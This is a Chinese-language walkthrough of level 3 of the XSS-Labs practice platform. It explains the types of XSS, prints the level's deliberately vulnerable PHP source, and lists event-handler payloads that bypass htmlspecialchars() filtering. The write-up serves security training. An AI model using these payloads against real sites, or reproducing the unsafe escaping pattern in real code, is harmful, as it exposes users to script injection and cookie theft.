XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS即存储型XSS,非常危险,容易造成蠕虫,大量盗窃cookie。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。
XSS-Labs是使用PHP编写的一个XSS漏洞练习平台,一共包含20关,其主要为反射型XSS,可以练习基础XSS的过滤和绕过技巧,且每一关的后台源码都重写了alert()方法,只要成功弹框即可调用重写的alert()方法进入下一关或完成本关测试。
FireFoxHackBar实验界面如下图所示:
使用如下payload进行测试,查看参数的回显位置以及是否被转义或过滤。
http://10.10.10.148:8203/level3.php?keyword=<script>alert(/onclink/)</script>
由上述操作可以推断,程序对h2标签和name=keyword的input标签中参数的尖括号进行了转义,而未对事件进行过滤,推测可有可能是使用htmlspecialchars()方法对,构造触发事件就可以正常弹窗,所以此处存在XSS漏洞。
构造如下所示的payload进行漏洞测试,结果如下图所示。
http://10.10.10.148:8203/level3.php?keyword='+οnclick='alert(1)
代码审计。程序源码如下所示:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level4.php?keyword=try harder!";
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
htmlspecialchars()函数转义后回显到HTML页面中。htmlspecialchars()函数转义后赋值给name=keyword的input标签的value值。所以基于脚本的注入无效,但基于事件的XSS仍可以使用。
程序对参数使用了htmlspecialchars()函数进行转义后回显到HTML页面中,所以此关的主要为基于事件的payload:
'+οnmοuseοver='javascript:alert(1)
'+οnclick='javascript:alert(1)
'+οnclick='alert(1)
'+onclick=alert(1)//
'+οnfοcus='alert(1)
...